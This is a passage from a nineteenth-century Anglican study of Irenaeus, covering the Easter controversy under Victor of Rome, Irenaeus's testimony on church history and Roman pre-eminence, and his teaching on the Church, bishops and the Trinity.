between the Churches of Asia Minor, Syria, and Mesopotamia on the
one hand, and the rest of the Christian world on the other, in regard
to the keeping of Easter;—other Churches uniting in keeping Easter-
day on a Sunday, whilst the Christians of those countries kept it at
the Jewish passover, on whatever day of the week it happened to
fall82. The inconvenience had been felt in the time of S. Polycarp,
who sojourning in Rome in the time of its bishop Anicetus, they
endeavoured [pg 045] each to persuade the other to embrace the
practice he followed. But their conferences were without any other
effect than to cause both parties to agree to differ in peace83. But
Victor, who succeeded Eleutherus in the see of Rome, viewed the
matter in a different light. He had no doubt felt the inconvenience of
this diversity of practice when Blastus endeavoured to raise a schism
in Rome on this very point84. He therefore conceived the idea of
using his influence, as the bishop of the principal Church [pg 046] in
the world, to bring all Christians to one uniform rule. For this
purpose he wrote to certain85 leading bishops in Asia, requesting
them to convene synods of the neighbouring bishops, in order to
come to an agreement; which was done accordingly; and they all,
with the exception of the Churches above mentioned, wrote circular
letters to the whole catholic Church, affirming that with them the
apostolical tradition was, not to break their paschal fast until the
Sunday. Eusebius particularly mentions86 the dioceses in Gaul under
the superintendence of [pg 047] Irenæus as having agreed upon
such a synodical letter, which he asserts was in existence in his time.
So far, Victor was successful; and, probably upon the strength of the
almost universal agreement of the Churches, he appears to have
held out some threat to those of Asia Minor87, unless they thought
proper to conform to the general practice. This, however, they
absolutely refused to do; maintaining that their region abounded
with relics of apostles and martyrs, and that they preserved a
tradition purer than that of any other Church, and more consonant
with the Scriptures. This reply so incensed Victor, that he forthwith
issued letters, announcing that the Asiatic brethren were cut off from
the common unity of Christians88. Here, however, he was not
followed by those who had previously agreed with him; and Irenæus
in particular, in the name of the Christians in Gaul under his
jurisdiction, wrote both to Victor and to various other bishops89,
strongly [pg 048] pressing milder measures, and reminding the
Roman prelate of the example of Anicetus, one of his predecessors,
who paid Polycarp the highest honour, even when assured that he
would not conform to the Western custom, and regarded his own as
more apostolical.

What the immediate result of these letters was we are not informed
by any contemporary writer. Anatolius, indeed, (if the Latin version
of his Treatise on the Paschal Cycle, published by Bucherius, is to be
relied on,) asserts that Victor did not persist in his
excommunication90; and we know subsequently91 [pg 049] that
many Churches in Asia adhered to the Jewish reckoning, and yet
were not on that account regarded with any aversion by their
brethren; and it was not until the council of Nice that their bishops
there assembled agreed to follow the general custom92,—to which,
however, many persons did not conform in the time of Chrysostom.

The part which the bishop of Rome took in this matter requires
perhaps a more explicit notice. It has, no doubt, been felt that Victor
acted in a manner which countenances the claims set up by the
popes of later days; but when we come to examine, we shall find
that whatever claims he advanced, beyond what we should allow,
were discountenanced by the then catholic Church. He did, or
attempted to do, two things: first, to bring the whole Church [pg
050] to one practice in the observance of the feast of Easter;
secondly, when he did not succeed with some Churches, to
excommunicate the dissentients.

The first was laudable; inasmuch as Christians who travelled upon


business, or removed their residence from one part of Christendom
to another, had their feelings disturbed by finding their brethren
celebrating so important a festival on a different day from that to
which they were accustomed; and some weak or factious minds
were thus tempted to make divisions in Churches to which they
removed. This had been particularly the case in the Church of Rome,
as being a place of general resort; and therefore Victor, both on that
account, and as bishop of the principal Church in the world, very
rightly exerted himself to bring about uniformity. The course he took
was also a good one. He wrote to the principal bishops in various
countries, to request them to call synods of the neighbouring
bishops, that thus he might ascertain the sense of the catholic
Church. Nothing could be more prudent or temperate; nor was
anything apparently better calculated to persuade the minority, than
to find one consenting custom in so many Churches, in countries
separated so entirely from each other.

Now so far we have no claim set up inconsistent [pg 051] with the
station of influence and dignity which we readily concede to have
appertained to the Roman bishops from very early times; and which,
if not most grossly abused, would never have been denied to them.
Some93 have supposed that he, with his letters, issued a threat of
excommunicating those Churches which refused to comply with the
western custom; but that is opposed to the sequel of the history,
from which we learn that such a threat would have called forth
remonstrances, of which in this stage of the business we hear
nothing.

Having received letters from every quarter except from Asia Minor,
stating that the traditional custom was the same as that of Rome, he
then, instead of proceeding by persuasion, immediately conceived
the idea of compelling the dissentient Churches to comply with his
wishes, by threatening to cut them off from communion if they
declined. His threat had no effect, and he proceeded to put it into
execution, nothing doubting that the Churches who had been with
him hitherto would still stand by him. And this is the point at which
we encounter something like the modern papal claims; for he
declared the Churches of Asia Minor cut off, not only from his
communion, but from the common unity94. Some might argue that
he must have had some foundation [pg 052] for this claim; but till
something of the kind can be shown, we have no need to suppose
any ground but a strong desire of a rash and determined mind to
carry the point he had undertaken. Be the ground what it may, the
Catholic Church negatived his claim; those who agreed with him in
the desire of bringing about unity of practice95 would not unite with
him in excommunicating their brethren, but rebuked him sharply96;
and Irenæus in particular represented to him the difference between
his spirit and that of his predecessors. And so entirely abortive was
his attempt, that, as we have seen, about sixty years after, Firmilian,
in his letter to Cyprian97, expressly asserted that the peace and unity
of the Catholic Church had never been broken by differences about
the observance of Easter or other religious rites: and that, in alluding
to the conduct of Stephen, bishop of Rome, who had quarrelled with
the African bishops because their custom differed from the Roman
on the subject of rebaptizing those who had been baptized by
heretics; which would necessarily have brought to mind any schism
produced by Victor, a previous bishop of Rome, if any such had been
produced.

Here, then, we have the most satisfactory evidence [pg 053] that
the Catholic Church, so near to the Apostles' times, had decided
against the power of the bishop of Rome to cut off whom he might
think fit from the common unity; not that they knew nothing of such
a claim, but that it was practically made and decided against.

We have now brought to a close all the circumstantial part of the


public life of Irenæus. Eusebius98 (who is followed by Jerome99) has
preserved to us the names of others of his writings, which we have
now lost. Of these he mentions first, A Discourse to the Gentiles,
which he characterizes as very brief, and very necessary, or cogent,
and informs us that the title of it was Περὶ Ἐπιστήμης, which Jerome,
in his Catalogue, translates De Disciplina, and supposes it to be
different from the Discourse. Another tract he wrote, dedicated to
one Marcianus, On the Preaching of the Apostles. The last Eusebius
mentions is a volume of miscellaneous tracts or discussions, of which
the ninth fragment is probably a remnant.

[pg 054]
The Discourse concerning Easter, quoted by the author of the
Questions to the Orthodox100, formerly ascribed to Justin Martyr, may
have been his letter to Victor on that subject. Maximus101 cites some
Discourses on Faith, addressed to Demetrius, a deacon of Vienne, of
which we have two fragments, whether genuine or not, (numbered
IV. and V.) in the best editions of his Remains. Although forty-two
fragments, attributed to Irenæus, have been collected, chiefly from
Catenas, we have no clue for appropriating the greater part of them
to the writings of which they formed a portion. One of them (the last
in the Benedictine edition) is said to pertain to a discussion on the
Eternity of Matter; but whether belonging to a separate treatise, or a
remnant of his Discourse to the Gentiles, we have no means of
judging.

We have no account of the death of Irenæus upon which we can


absolutely depend. Jerome in one passage102 calls him a martyr, and
so does the author of the Questions and Answers above cited; but
no other early writer gives him that appellation; neither have we any
notice of his death by any [pg 055] earlier author than Gregory of
Tours103, who wrote towards the end of the sixth century, and who
asserts that he died a martyr in a bloody persecution, which the
martyrologists Usuard and Ado104 assert took place under Severus.
In fact all the martyrologists, both Latin and Greek, make him a
martyr. The tradition, therefore, appears a highly probable one. But
in whatever way he quitted this world, we may rest assured that his
name is written in the book of life. His body is said105 to rest in the
crypt under the altar of the Church of St. John at Lyons.

[pg 056]
Chapter II. Testimony of Irenæus to
Certain Facts of Church History.

There are two circumstances which must prevent us from expecting


that the writings of Irenæus should add largely to our stores of
historical knowledge; one, that his remains are not very considerable
in extent, and the other, that they are chiefly occupied in doctrinal
controversy. What, however, he does tell us, is important. He asserts
that the Church in his time was spread throughout the world106; and
particularly specifies the Churches in Germany, Iberia, (i. e. Spain),
amongst the Celts (i. e. in Gaul), in the East, in Egypt, in Lybia, and
in the centre of the [pg 057] world, by which he no doubt means
Palestine107. He likewise incidentally shows that the Gospel had been
preached in Ethiopia108. He furnishes no evidence concerning the
first missionaries, except in the case of Ethiopia, to which he informs
us the eunuch baptized by Philip was sent; but he declares explicitly
that all the Churches through the world, although differing in
usage109, had but one faith110, which was delivered to them at
baptism111.

He speaks of the Churches in general as having been settled by the


Apostles112, and particularly specifies [pg 058] that the Church of
Rome was founded by S. Peter and S. Paul, who appointed its first
bishop Linus113; that Polycarp was made bishop of Smyrna by
Apostles114, and that the succession from him had been kept up to
the time of his writing115; and that S. John watched over the Church
of Ephesus down to the time of Trajan116. He informs us that the
successors [pg 059] of the first bishops might be reckoned up in
many Churches down to his own time117, particularly specifies the
Churches of Rome and Smyrna118, and gives a catalogue of the
bishops of Rome as follows:—Linus, mentioned by S. Paul in his
epistles to Timothy119; Anencletus120; Clement121, who had seen and
conferred with the Apostles; Evarestus; Alexander; Xystus, or Sixtus;
Telesphorus, who suffered martyrdom; Hyginus; Pius; Anicetus;
Soter; Eleutherius122: and we have a fragment of a letter of [pg 060]
his own to Victor, the successor of Eleutherius123. He has preserved
an anecdote of St. John, viz. that upon one occasion entering a
bath, and seeing Cerinthus there, he withdrew precipitately, saying
that he was afraid lest the building should fall, because Cerinthus,
the enemy of the truth, was in it124. This anecdote is indeed at
variance with the notion of Christian charity current at the present
day, but it rests upon the testimony of Polycarp, who knew St. John
well; and it is strictly in accordance with the spirit of the directions
he himself gave to “the elect lady,” not to receive heretical teachers
into her house, or bid them God speed125.

We are likewise indebted to Irenæus for some particulars respecting
Polycarp. He states that he had been favoured with familiar
intercourse with St. [pg 061] John and the rest who had seen Jesus,
and had heard from them particulars respecting him and his miracles
and teaching126. He mentions his having spent some time in Rome in
the days of Anicetus127. He does not, indeed, state the cause of his
visit; but Eusebius128 and Jerome129 distinctly say that it was on
account of the Paschal controversy. This subject, amongst others,
our author states to have been discussed between them, and that
Polycarp rested his adherence to the Jewish practice upon his having
always kept Easter in that way with St. John and the other Apostles,
and consequently declined to change it; whereupon, to show that
this inflexibility had produced no breach of amity, Anicetus thought
proper to request Polycarp to officiate for him, and to take his place
at the holy communion130. During his stay there131 he met Marcion,
who inquired if he [pg 062] recognised him. His reply was, “I
recognise the first-born of Satan.” This severity (or bigotry, as it
would now be called) does not appear to have operated in his
disfavour; for he was instrumental in recovering to the Church many
who had been led away by the Gnostic delusions132. Irenæus
likewise mentions Polycarp's epistle to the Philippians133, and other
epistles to other Churches and individuals134.

Respecting Clement, whom Eusebius135 identifies with the companion
of S. Paul136, he states that he wrote a very effectual letter to the
Corinthians, to allay the dissensions which had arisen amongst them,
and to restore the integrity of their faith137. This is, of course, the
first epistle of S. Clement, to the genuineness [pg 063] of which his
mention of it is a powerful testimony.

He speaks of the Church of Rome not only as having been founded
and settled under its first bishop by St. Peter and St. Paul, but as
being one of the greatest and most ancient, well known to all
men138, preserving the true doctrine by the resort of persons from all
quarters, and possessing from this circumstance a more powerful
pre-eminence; and states that all Churches must on that account
resort to it139. It is well known that this is a passage upon which
Romanists very much rely, as establishing the claim of their Church
to be the mistress of controversies to all Christendom; and I have
chosen to give it the utmost force of which it is fairly capable, in
order to avoid the charge of slurring it over, and in order to show
that even thus it states nothing inconsistent with the doctrine of the
Church of England respecting the present Church of Rome. I will
therefore give a translation of the passage, which appears below,
and make some remarks upon that translation:—“For every Church
(that is, the faithful who are on all sides,) must on account of its
more powerful [pg 064] pre-eminence resort to this Church, in which
the apostolical tradition is preserved by those who are on all sides.”

There are several words in this passage which must influence the
sense of it. The first I shall notice is the word potentiorem, the more
especially as there is a various reading upon it. One MS. (the
Clermont) of considerable value, reads potiorem; but Massuet, who
examined it, says that it had been written pontiorem (but altered to
potiorem,) which is almost certainly a contraction for the common
reading. We must therefore, I conclude, sit down with the common
reading; although Massuet, in the Benedictine edition, and J. J.
Griesbach, in some remarks upon this passage140, prefer the other.
But what Greek word potentiorem represents must be matter of
conjecture; and no one who is acquainted with the manner in which
the translator has rendered Greek words will be inclined to lay much
stress upon it. It may have been put for ἱκανωτέραν, or κρείττονα;
or, in short, the comparative of any adjective which admits of being
rendered potens. We then come to the word principalitatem. This we
know that the ancient translator of Irenæus uses to signify ἀρχή141.
Putting these two together, Griesbach [pg 065] has rendered
κρείττονα ἀρχὴν, potiorem initium, and thus got rid of the idea of
authority altogether. But there is no need of this. Principalis is used
by the translator as the rendering of ἡγεμονικός142; principaliter, of
προηγουμένως143, and προηγητίκως144; principalitatem habeo, of
πρωτεύω145. We know that all the apostolical sees had a kind of
principality or pre-eminence above the surrounding Churches; a
more powerful pre-eminence than other Churches equally ancient
with themselves. Nay, we know that the Church of Rome had at that
time, in point of fact, a more powerful pre-eminence than any other
Church.

The next word to be considered is convenire, which may be
rendered either resort or agree; and I confess I should have been
disposed, with Massuet, to render it agree, were it not for a perfectly
parallel passage in the 32d Oration of Gregory of Nazianzum,
delivered at the first council of Constantinople. Speaking of
Constantinople, he says, εἰς ἣν τὰ πανταχόθεν ἄκρα συντρέχει, καὶ
ὅθεν ἄρχεται ὡς ἐμπορίου κοινοῦ τῆς πίστεως. Here Constantinople
is spoken of then under the very same terms as Rome by Irenæus,
as the common repository of the faith: other parts of the Christian
world are said to [pg 066] be governed (ἄρχεται) by it; and distant
Churches are said to resort from all quarters: συντρέχει πανταχόθεν.
Are not these words an exact parallel to the convenire and undique
of the translator of Irenæus? I therefore feel bound to give
convenire the sense of resort. The next word to be noticed is
undique, the application of which is disputed; some, as Barrow146
and Faber147, applying it only to the immediate neighbourhood of
Rome, i. e. Italy and the adjacent parts of Gaul; others, and of
course the Romanists, to the whole Christian Church. According to
the former plan, the clause “hoc est ... fideles” is a limitation of the
expression “omnem ecclesiam,” confining it to the Churches
immediately surrounding Rome; and consequently the pre-eminence
of the Church of Rome would be equally narrowed by this
interpretation of undique. I am far from contending that this
interpretation is not correct; and the very fact of the passage
admitting it, without any force whatever, shows how little the papal
cause can be made to rest upon it. But as Gregory, in the parallel
[pg 067] passage I have quoted, uses the term πανταχόθεν, I am
disposed to take undique as its representative; the more especially
as we have seen that, whatever influence it gives to Rome, the
selfsame influence had Constantinople in an after age.

There are one or two more words still to be mentioned. Necesse est
is one of them. It may imply that it is the duty of every Church to
resort to Rome; but its more natural and usual meaning is, that, as a
matter of course, Christians from all parts, and not strictly the
Churches themselves, were led to resort thither by the superior
eminence of that Church.

I have hitherto taken this passage as though it must be applied
definitely to the Church of Rome. But this is by no means necessary;
for it may be a general observation applicable to all the most
eminent Churches, as may be seen by the following translation and
arrangement of it:—“For every Church, (that is, the faithful all
around,) must necessarily resort to that Church in which the
apostolical tradition has been preserved by those on all sides of it,
on account of its more powerful pre-eminence;” that is, Christians
must have recourse each to the most ancient and most eminent
Church in his neighbourhood. And this agrees with a passage of [pg
068] Tertullian148, in which he refers southern Greeks to Corinth,
northern to Philippi and Thessalonica, Asiatics to Ephesus, Italians
and Africans to Rome. The only objection which occurs to me lies in
the word hanc, which, if the passage is to be taken in this
application, must be translated that; but as it was in all probability
the representative of ταύτην, this word can scarcely present any
difficulty.

I will close this whole discussion with two remarks; first, that unless
we could recover the Greek text of this passage, it is plainly
impossible to ascertain its true sense; and secondly, that the
strongest sense we can attach to it, consistently with history, is, that
Christians of that period from all parts of Christendom must, if they
wish to ascertain traditions, have recourse to the Church of Rome,
because, as the first Church in Christendom, the common traditions
were preserved there by the resort of Christians from all quarters.
This twofold reason for resorting thither has long ceased to exist,
and consequently this passage of Irenæus can afford no support to
the claims of modern Rome, until it can be proved that those
portions of the Christian world which are not in communion with her
are no part of the Catholic Church.

[pg 069]
There is another subject which has caused much discussion, which is
adverted to by Irenæus, viz. the miraculous powers of the Church.
He declares that in his time powers of this kind were possessed by
Christians, such as raising the dead149, and casting out devils, and
healing the sick; that they likewise had the gift of prophecy150, and
spoke with tongues, and [pg 070] revealed secret things of men and
mysteries of God151. It is well known that Gibbon and Middleton have
thrown doubt upon the miraculous powers of the primitive Church;
and one of their chief arguments is that the early writers, such as
Irenæus, content themselves with general statements, but bring no
specific instance. The subject has been very fully entered into by the
present highly learned and amiable bishop of Lincoln, Dr. Kaye, in his
work on Tertullian152; and in the general I am disposed to acquiesce
in the theory adopted by the bishop, that those powers were
conferred only by apostolical hands, and that of course they would
continue till all that generation was extinct who were contemporary
with St. John, the last of the Apostles. That would admit of Irenæus
having known instances; and not having any idea that the power
was to be extinct, he would think that it still remained, even if he
had not known any recent instances. It is necessary to remark,
however, that he speaks of the gifts of tongues and the revealing of
secrets and mysteries, not as a thing coming under his own
knowledge, but heard of from others; and it does not appear that he
intends to say that they continued to his own time. And I will
venture to observe that it appears rather unfair to Irenæus to set
[pg 071] aside his testimony by saying that he brings no specific
instance of those things which he speaks of as still done. He might
feel that the thing was so notorious, that those who were not
convinced by the notoriety of such occurrences would cavil at any
particular case he might select; and his mentioning that some of
those who had been delivered from evil spirits had become converts,
that some of those who had been raised from the dead, being poor,
had been assisted with money153, and that some had lived many
years after154, surely indicates that he was speaking from a
knowledge of individual cases. One should indeed have expected
that every one who owed his deliverance from Satanic possession to
the miraculous power possessed by Christians would have embraced
the faith of those who exercised it; and the circumstance that
Irenæus affirms this of some only gives a greater air of probability to
his whole statement. Besides this, we must distinguish between the
cases of persons healed by the direct agency of an individual, and
those in which it pleased God to hear the joint prayers of several; for
it is observable that our author attributes the raising of the dead
only to [pg 072] the united prayers and fasting of a whole Church,
and confines it to cases of great urgency155.

The testimony which Irenæus bears to the relation between the
Church and the empire is but slight. He mentions a Christian as
having been in his own youth high in the imperial court, at the same
time that he was a follower or admirer of Polycarp156; he speaks of
Christians in the imperial palace deriving an income from the
heathen, and able to assist their poorer brethren157; and he
acknowledges the general advantages which Christians derived from
the supremacy of the Romans, in common with their other subjects,
in the prevalence of peace and the freedom from individual
outrage158. But he mentions very distinctly the persecutions at
another time Christians suffered (particularly alluding to those which
took place at Lyons), and notices that slaves were compelled to
inform against their masters; and that in this way the calumny that
Christians fed upon human flesh arose, from a misunderstanding of
the nature of the holy Eucharist159; the slaves having heard their [pg
073] masters speak of feeding on the body and blood of Christ, and
taking it in a literal sense.

[pg 074]
Chapter III. On The Nature, Office, Powers, and Privileges Of The Church.

The proper aspect to view the Church in is a matter of so much
practical importance at all times, that it can never be uninteresting
to know the light in which it was regarded in the subapostolical age,
of which Irenæus is a very unobjectionable evidence.

We shall find then that this writer considered the Church to be an
ascertainable society, planted first at Jerusalem160, and thence
spread to the limits of the habitable globe161; planted by the
Apostles, and kept up by and in the elders or bishops their
successors162. It is, however, divided into separate Churches, which
are to regard that of Jerusalem as their mother [pg 075] Church163.
The whole Church, moreover, is to its individual members as a
mother to her children164: [pg 076] she is appointed for the
quickening of creation165, and in her is the way of life166, which those
who keep aloof from her do not possess167; in her is the Holy Spirit,
which is not to be found out of her168. She possesses the adoption
and inheritance of Abraham, and her members are consequently the
seed of Abraham169. Being thus appointed for the quickening of the
world, by being the way of life to its members, she has for that
purpose received the faith from the Apostles, which it is her business
to distribute to her children170. She is therefore the appointed
preacher of the faith, or the truth, which is not variable and [pg 077]
changeable, but one, and only one171; not merely a quality infused
into the heart, but a form of truths embodied or summed up in
words, and delivered to her members when they are initiated into
her172. Her ancient system is therefore the guide to truth173, and
those who wish to know it must have recourse to her, and be
brought up in her bosom174. Her testimony, moreover, is confirmed
by the Apostles and Prophets175, whose writings are kept in the
custody of her elders176, with which, moreover, those must [pg 078]
expect to be fed who come to her177. She has succeeded to the
office of the ancient Jewish Church of being the great witness of the
unity of the Godhead178.

To show that she is commissioned from above, she wrought
continual miracles for the good of the world by prayer and invocation
of the name of Jesus179; she even raised the dead by means of
fasting and prayer180; and she alone produced persons who sealed
their own sincerity and the truth of their faith by their blood181.

Finally, although not exempt from weakness, and [pg 079] capable
of losing whole members, she, as a body, remains imperishable182.

It is remarkable how strictly this notion of an external, visible,
ascertainable body, consisting of individuals, and under the
government of individual officers, having a personal succession in
distinct localities183, is in accordance with the doctrine of the Church
of England; and how totally opposed it is to the notions held
amongst dissenters, and by individuals within the Church in modern
times. According to Irenæus, moreover, the different classes of
sectaries would be regarded as having neither spiritual life nor the
Holy Spirit, except so far as they might be supposed to be in
communion with the body governed by elders or bishops descended
from the Apostles. If in any way or to any degree they can be
supposed to be in communion with them, to that extent they would
be thought to have the Holy Ghost, and to be in the way of life, but
no further. I am not now discussing whether he was right or wrong;
I am merely pointing out the contrariety between his views of the
Church and those which appear to be most popular at present. I
doubt if most Protestants would not pronounce his doctrine to be
gross [pg 080] bigotry; for very many of those who would go so far
with him as to acknowledge the Church to be a visible society, would
be very far from restricting the grace of the Holy Spirit to the
communion of the bishops in succession from the Apostles.

I must, however, direct more particular attention to one part of his
system which did not require to be brought out prominently. We
have seen that he thought it possible for the Church to lose whole
members. In fact, although he thought that the truth was kept up by
the succession of bishops throughout the Church, and that it was a
mark of truth to be so kept up, he still believed that presbyters or
bishops might, through pride, or other evil motives, make schisms in
the Church184; and he taught that those were to be adhered to who,
with the succession, [pg 081] keep the Apostles' doctrine, and lead
good lives185; implying, of course, that some who were in the
succession might depart from the Apostles' doctrine. The succession
was not, therefore, in his opinion, an infallible test of truth in the
individual Church. Any individual Church, or even a considerable
number or collection of Churches, might fall into heresy, and thus
become cut off from the Church; but it is evident that he did not
think this possible to happen to the great body of the Church.

It is manifest from this that he thought the private Christian must
sometimes pass judgment upon his bishop, and might be called
upon to separate from him, and to adhere to those who were more
orthodox. In what cases this was requisite, or what was to be the
extent of the alienation, he does not give any hint; but this clearly
establishes that he thought private judgment upon religious
controversy to be sometimes a duty: for without the exercise of
private judgment upon the part of the layman, it would be in some
cases impossible for him to show his preference for those bishops
who adhered to the Apostles' doctrine.

[pg 082]
We find no trace in Irenæus of any authority in the Church of Rome
to decide controversies for the rest of the Church. On the contrary,
he taught Christians to have recourse to any ancient apostolical
Church, or rather collection of Churches186, if they wished to
ascertain the traditional system of the Church. He indeed quotes that
Church as being in his time a more important witness to the truth
than any other individual Church, because, through the continual
concourse of Christians thither, in consequence of its more powerful
pre-eminence, the traditions of the universal Church were there
collected as it were into a focus187; but, as I have pointed out
elsewhere188, he recognises no authority in that Church to claim to
decide controversies. With him it is not any individual Church that is
commissioned to preserve the truth, not even the Church of
Jerusalem, which he calls the mother of all Churches (a title which
has been since arrogated by the Roman Church), but the Catholic
Church, truly so called, by the mouth of her pastors throughout the
world; for although he mentions the pre-eminence of the Church of
Rome in his day as a matter of fact, he does not [pg 083] state it to
be a matter of right; nor does he ground any thing upon it but the
further fact that it followed, of course, that Christians resorted to it
from all quarters, as they did afterwards to Constantinople. He gives
no hint as to the source of that pre-eminence, other than its having
been settled by the two Apostles St. Peter and St. Paul, and
honoured with being the scene of their martyrdom189. And his appeal
to it he builds, not on any authority residing in it, but upon the fact
that at that time the confluence from all parts of the Church caused
the tradition of the whole Church to be best preserved there, as was
afterwards the case at Constantinople, and has since been no
where. So that his appeal to Rome is not in fact an appeal to that
Church, but to the Church universal; and since Rome has ceased to
be the place of resort to the universal Church, the ground for
appealing to her has ceased likewise.

On the subject of the Bishops of the primitive Church several
questions have arisen, and it is of course highly desirable to know
whether Irenæus furnishes any evidence on either side of them. It is
not to be expected that we can discuss any of them fully by the aid
of any single writer; but such indications as we meet with may with
propriety be drawn out.

[pg 084]
That which first demands our notice is whether Bishops existed, as a
distinct order from Presbyters, from the beginning.

Now Irenæus does undoubtedly call the same persons by the name
of Bishops and Presbyters interchangeably. But it has been long ago
pointed out that the circumstance of the same name being borne by
persons holding two different offices, proves nothing. It is unsafe to
infer from the circumstance that bishops are called presbyters, or
presbyters bishops, that therefore there was not a permanent officer
set over the other presbyters, and endued with functions which they
could not exercise, although not at first distinguished by a specific
name.

On the other hand, we learn from him that there were to be found in
every part of the Christian world bishops or presbyters placed at the
head of Churches, which from their importance, must have had
other presbyters in them, and which we know from other sources to
have had other presbyters in them; that there was only one of these
at one and the same time; that they were intrusted with the
government of the Churches, and called the Bishops of those
Churches; that the authority of the office was handed down from
individual to individual; and that the individuals who filled this office,
and by consequence [pg 085] the office itself, were appointed by
inspired apostles190. All these facts are irreconcileable with the
hypothesis that all presbyters were equal in authority and function.

The question whether these bishops and presbyters might not have
been simply pastors of independent congregations, is answered by
finding that they had other presbyters under them, (as Irenæus
under Pothinus, and Florinus and Blastus under the Bishops of
Rome,) and that in places such as Rome, where there were probably
more congregations than one.

There is nothing in Irenæus to favour the idea that the
subject-presbyters were not properly clergymen; on the contrary, the letter
of the martyrs to Eleutherius would appear to speak of Irenæus as a
clergyman, when we at the same time know him to have been a
presbyter: and it does appear in the highest degree improbable that
the flourishing Church of Rome, which we know to have been the
place of residence of two Apostles at once, should have been left,
down to Irenæus's time, with only a single clergyman in it, which
must have been the case upon this theory; to say nothing of
Smyrna, which, according to the same scheme, must have [pg 086]
been left destitute of spiritual superintendence during Polycarp's visit
to Rome, which S. Irenæus has recorded.

But granting the existence of Bishops such as we have them now,
and their appointment by Apostles, another question arises, first
suggested, so far as we know, by S. Jerome, whether the powers
now exclusively reserved to Bishops, such as ordination and
government, were so exclusively delegated to them by the Apostles,
as that those powers exercised by other presbyters are invalid. The
question does not appear to have occurred to Irenæus: but we have
no hint in him of other presbyters having the same authority as the
bishops of the Churches; on the other hand, he expressly states that
the Apostles committed the Churches to the government and
teaching of individual bishops or presbyters in each, making them
their successors, and giving them their own office191. And the very
circumstance of their committing the Churches to those individuals
did (by what appears to me inevitable consequence) exclude all
others from the same place to which those individuals were
appointed, and constitute them an order by themselves. And that
the universal Church understood the appointment in that sense is
proved by the fact, recorded by Irenæus, that the succession of
authority [pg 087] was kept up in individuals down to his time; the
evident implication being that it was so in all Churches.

The evidence, therefore, supplied by Irenæus, although not enabling
us, by itself, to discuss the whole question fully, is in support of the
discipline of the Church of England, which refuses to recognize the
ordinations of any but bishops, properly so called, and having their
authority in succession from the Apostles192.

[pg 088]
Chapter IV. On The Doctrine of the Holy Trinity.

The controversy which Irenæus carried on with the Gnostics being
directly and explicitly on the subject of the Divine Nature, led him to
treat distinctly of the divinity and humanity of Christ and his
incarnation, of the providential government of God, and his various
manifestations. He is thus led, almost of necessity, to enunciate the
doctrine of the Trinity in Unity in various aspects, but most especially
in regard to the twofold nature of Christ.

In direct reference to the doctrine of the Trinity in Unity, he
describes the agency of the three Persons in the creation of man;
the Father willing and commanding, the Son ministering and
forming, the Spirit sustaining and nourishing him193. So again he
declares that God made all things by his Word [pg 089] or Son, and
Wisdom or Spirit, using the terms personally; and that this was the
same thing as making them by himself194, because they are his
hands195. And again, in explaining God's dispensations in regard to
man, he affirms196 that God was seen under the Old Testament by
the Spirit of prophecy, that he was seen subsequently by means of
the Son, adoptively, [pg 090] i. e. adopting human nature into the
divine197, and that he will be seen in his character of Father in the
kingdom of heaven; and that in this way the Spirit in the Son
prepares man, and the Son brings him to the Father, and the Father
grants to him immortality: and so again in the work of man's
redemption198, the Spirit operates, the Son supplies, the Father
approves, and man is perfected to salvation. He likewise gives two
statements of the substance of the Creed, in which the three
Persons of the Trinity are spoken of in the same manner as in the
Nicene Creed, both of which will be given in a subsequent chapter.

These are all the passages, so far as I have been able to discover,
which speak of the three Persons of the most Holy Trinity together;
but the doctrine is implied throughout.

On the twofold nature of Christ, and especially on his divinity, he is
more full. Indeed it would take more space than I can spare to
introduce all the passages which bear upon the subject.

[pg 091]
Very near the beginning of his treatise, in rehearsing the faith of the
Church, he speaks of “Christ Jesus our Lord and God and Saviour
and King199;” further on he quotes many passages of Scripture to
show that he was spoken of absolutely and definitely as God and
Lord200, and asks the question, [pg 092] How would men be saved, if
He who wrought out their salvation upon earth was not God201?

He asserts that the Word was with God from everlasting202, and that
Jesus was the Son of God before the creation203, that no man knows
the mode of his [pg 093] generation204, and that God made all things
by his indefatigable Word, who is the Artificer of all things, and
sitteth upon the cherubim, and preserves all things205. He declares
that the Lord who spake to Abraham was the Son206, and that it was
the Word that appeared to Moses207.

This Divine Word, then, was united with his creature208, (which union
is expressed by the name Emmanuel209,) and humbled himself to
take upon him [pg 094] the infant state of man210, and thus having
become Son of man211, went through all the ages of man212, and
finally hung upon the cross213. He asserts, moreover, that although
the angels knew the Father solely by the revelation of the Son214,
and indeed all [pg 095] from the beginning have known God by the
Son215, so that the Father is the Son invisible, and the Son the Father
visible216, yet that the Son knew not the day of judgment217; and
that this was so ordered, that we may learn that the Father is above
all218, and that the Son ministers to the Father219: finally, that when
Jesus was tempted and suffered, the Word in him restrained his
energy220. But he declares likewise that Christ remained in the
bosom of the Father, even when upon earth221.

[pg 096]
These mysteries in the nature of Christ Irenæus does not attempt to
explain, fully holding the eternal and unchangeable Divinity of the
Son, even when made flesh, and his strict personal union with that
flesh, and at the same time asserting his subordination to the Father,
even in his divine nature; feeling that when we cannot discover the
reason of every thing, we should consider the immeasureable
difference between us and God222; that if we cannot explain earthly
things, we cannot expect to explain heavenly things, and that what
we cannot explain we must leave to God223; and in short that it [pg
097] is much better to know nothing but Christ crucified, than by
subtil inquiries to fall into impiety224.

This Jesus, then, who has been testified of by all things that he was
truly God and truly man225, being related to both God and man, and
thus having the indispensable qualification for his office, became the
Mediator between them226; he came in every dispensation, [pg 098]
and summed up all things in himself227. He was born about the forty-
first year of the reign of Augustus228; when not full thirty he was
baptized, but he did not begin to teach till past forty229. His ministry
extended through three passovers230, and [pg 099] he suffered on
the day of the passover231. He is our High Priest232; he gave his soul
for our souls, and his flesh for ours233; his righteous flesh has
reconciled to God our sinful flesh234; and he brings us into union
and communion with God235. He rose again in the flesh236, and in the
flesh he ascended into heaven, and [pg 100] will come again to
judgment237; and he introduces his Church into the kingdom of
heaven238.

Respecting the Holy Ghost, Irenæus declares that he was with God
before all created things239, and (as we have seen) that he was the
Wisdom of God, whose operation was the operation of God240; that
he is rightly called Lord241; and he affirms that the bread of eternal
life, which is the Word, is also the Spirit of the Father242. He speaks
of him as coming with power to give entrance unto life to all nations,
and to open to them the new Covenant, and as offering to the
Father on the day of Pentecost the first fruits of all nations243.

[pg 101]
He affirms that man, at his creation, had the image of God in the
flesh, the likeness in the soul by the communication of the Divine
Spirit244. He implies that, since the fall, man has lost the Spirit, and
consequently the life of his soul; he asserts that he remains carnal
until he recovers the Spirit of God245, and then he becomes again a
living soul, and has in him the seed of eternal life246; that the Spirit
[pg 102] we receive here is a pledge of a fuller portion247; and that
at the resurrection the souls and bodies of the just will be quickened
